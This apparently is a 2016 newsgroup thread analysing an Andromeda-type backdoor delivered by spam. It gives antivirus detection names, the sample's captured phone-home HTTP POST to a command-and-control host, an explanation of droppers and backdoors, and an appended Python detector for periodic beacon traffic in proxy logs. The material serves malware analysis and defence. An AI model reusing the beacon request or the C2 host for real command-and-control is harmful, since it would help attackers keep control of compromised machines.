Just got a new viral-spam payload (Androm / Outbreak / Sality)

This came in almost 3 hours ago:

https://www.virustotal.com/en/file/89e7c151213131873ecf2cd16ba6842e21c391201f9494c8f574d56b75172963/analysis/1460034005/

VT scan result 12/57  

AegisLab      Troj.W32.Gen.lJ4P
Arcabit       Trojan.A
Avast         Win32:Trojan-gen
Baidu         Win32.Trojan.WisdomEyes.151026.9950.9957
Ikarus        Win32.Outbreak
Kaspersky     Backdoor.Win32.Androm.jkpi
Malwarebytes  Backdoor.Bot
McAfee-GW     BehavesLike.Win32.Sality.ch
Qihoo-360     HEUR/QVM10.1.Malware.Gen
Rising        PE:Malware.Obscure/Heur!1.9E03 [F]
Sophos        Mal/Generic-S
Tencent       Win32.Trojan.Inject.Auto

Uploaded to uploadmalware.

I'll mess around with it a little and see what else I can find out.

Spam originated from 193.16.229.57 (Poland).

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

On 4/7/2016 9:22 AM, Virus Guy wrote:

There is a big difference between Sality and an Andromeda backdoor bot.
If it was truly Sality, all anti-virus vendors would have that detection.

Most likely, it is an Andromeda/Gamarue trojan.


--  
Dave
Multi-AV Scanning Tool - http://multi-av.thespykiller.co.uk
http://www.pctipp.ch/downloads/dl/35905.asp

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

"David H. Lipman" wrote:

I did upload it to uploadmalware - so you should have access to it.

malwr.com analysis shows HTTP traffic, but they seem to be POSTs, not
GETs.  So it wasn't clear to me if there were any visible or operable
payload URLs to be had.

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

On 4/9/2016 1:23 PM, Virus Guy wrote:

As a Backdoor, it has to Beacon the compromised system and/or Phone Home.

POST /allow.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 42
Host: betaleuco.net

--  
Dave
Multi-AV Scanning Tool - http://multi-av.thespykiller.co.uk
http://www.pctipp.ch/downloads/dl/35905.asp

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

"David H. Lipman" wrote:

Wouldn't the act of downloading a payload package be a beacon or signal
in and of itself?

What is being "beacon'd" or signaled by the following that couldn't be
done by Getting what presumably it will end up getting anyways in the
near future?

?

Is there a difference between a backdoor and a dropper?

Am I thinking that these initial infectors are usually droppers - in
that the first (and perhaps only) thing they do is obtain and launch at
least one additional code file from an external server?  

Whereas a backdoor has enough functionality to be persistent on the
infected system and accept incoming connections to carry out future
instructions?

If the latter, how does the backdoor ensure that it is reachable through
the gateway or NAT router through which the host is presumably connected
to the internet?  (presumably it can easily defeat any firewall running on
the host)

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

On 4/10/2016 10:00 AM, Virus Guy wrote:


Dropper just refers to an initial action.  A trojan can be a dropper or
a downloader.  A dropper means that a trojan is encapsulated in another
file.  It can be an MS Office document or it can be an EXE like an SFX.
It drops the payload.  The dropper is the delivery mechanism for the
payload.

A downloader is simply a trojan that gets the payload from the Internet.
Either the file is in raw PE format or it is being obfuscated with a
different file extension such as PDF or JPG.  Or it could be Zlib
encoded or in Base64 format or XOR'd with some value or even encrypted.
But the results are the same: the downloader trojan obtains the
payload from the Internet.  That payload may be hard-wired in the
downloader or it may obtain the download site from a C2 server and then
download the payload.

The Backdoor is the end result.  The payload.

The malicious actor does not know what system(s) are now compromised and  
can be used to their benefit.  Thus the now compromised system will  
beacon and/or Phone Home telling the malicious actor this system is now  
available.

The backdoor invites the malicious actor and thus grants access to the
compromised system so it can communicate through a NAT router.  It is
the job of the firewall constructs of NAT, or of a full firewall
implementation within the NAT router, acting as the doorman of the router,
to determine whether even invited systems can get through the NAT router.  So
if the backdoor opens TCP port 23500, it would be up to the firewall
constructs of NAT, or a full firewall implementation, to
block the malicious actor from ingress through TCP port 23500.




--  
Dave
Multi-AV Scanning Tool - http://multi-av.thespykiller.co.uk
http://www.pctipp.ch/downloads/dl/35905.asp
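An added example, not from the thread or either poster: the beacon shape Dave quoted earlier (a tiny application/octet-stream POST to /allow.php on betaleuco.net) plus the point that a backdoor behind NAT has to phone home on its own timer suggest one detection a defender can run over proxy logs. The log lines, the 10.0.0.x clients and the example.com hosts are constructed; the 256-byte body limit and the 10% jitter threshold are assumptions, not values from the thread.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy log (not from the thread): time, client, method, host,
# path, content type, request body bytes. The /allow.php POSTs mirror the request
# quoted upthread; the 10.0.0.15 lines are irregular or bulky and must not match.
LOG = """\
2016-04-09T13:20:00 10.0.0.12 POST betaleuco.net /allow.php application/octet-stream 42
2016-04-09T13:20:30 10.0.0.12 GET www.example.com /index.html text/html 5120
2016-04-09T13:21:00 10.0.0.12 POST betaleuco.net /allow.php application/octet-stream 42
2016-04-09T13:22:01 10.0.0.12 POST betaleuco.net /allow.php application/octet-stream 42
2016-04-09T13:22:59 10.0.0.12 POST betaleuco.net /allow.php application/octet-stream 42
2016-04-09T13:05:00 10.0.0.15 POST intranet.example.com /ping.php application/octet-stream 40
2016-04-09T13:33:00 10.0.0.15 POST intranet.example.com /ping.php application/octet-stream 40
2016-04-09T13:34:00 10.0.0.15 POST intranet.example.com /ping.php application/octet-stream 40
2016-04-09T13:40:00 10.0.0.15 POST intranet.example.com /upload.php application/octet-stream 81920
"""

def parse_line(line):
    """Split one space-separated log line into a record."""
    ts, src, method, host, path, ctype, size = line.split()
    return {"ts": datetime.fromisoformat(ts), "src": src, "method": method,
            "host": host, "path": path, "ctype": ctype, "size": int(size)}

def beacon_signature(rec, max_body=256):
    """Shape of the request quoted in the thread: a tiny octet-stream POST to a
    .php path. Real uploads are POSTs too, but they carry a real body."""
    return (rec["method"] == "POST" and rec["ctype"] == "application/octet-stream"
            and rec["path"].endswith(".php") and rec["size"] <= max_body)

def find_beacons(log_text, min_count=3, max_jitter=0.1):
    """Group signature hits by (client, host, path) and keep those whose gaps
    between requests are nearly constant, i.e. driven by a timer, not a user.
    Returns {(src, host, path): mean gap in seconds}."""
    by_key = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if beacon_signature(rec):
            by_key[(rec["src"], rec["host"], rec["path"])].append(rec["ts"])
    found = {}
    for key, stamps in by_key.items():
        if len(stamps) < min_count:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:  # coefficient of variation
            found[key] = avg
    return found
```

On the sample log only the 10.0.0.12 client is reported, phoning home to betaleuco.net roughly every 60 seconds; the irregular /ping.php POSTs and the large upload pass through untouched.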
